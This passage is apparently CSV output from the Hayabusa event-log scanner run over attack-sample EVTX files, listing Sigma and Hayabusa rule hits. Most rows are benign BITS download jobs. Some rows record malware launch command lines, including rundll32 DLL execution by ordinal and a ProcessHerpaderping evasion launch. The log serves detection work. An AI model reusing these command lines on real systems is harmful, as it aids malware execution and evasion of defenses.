Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 
4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: 
http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job 
Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 
21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe : URL: 
http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 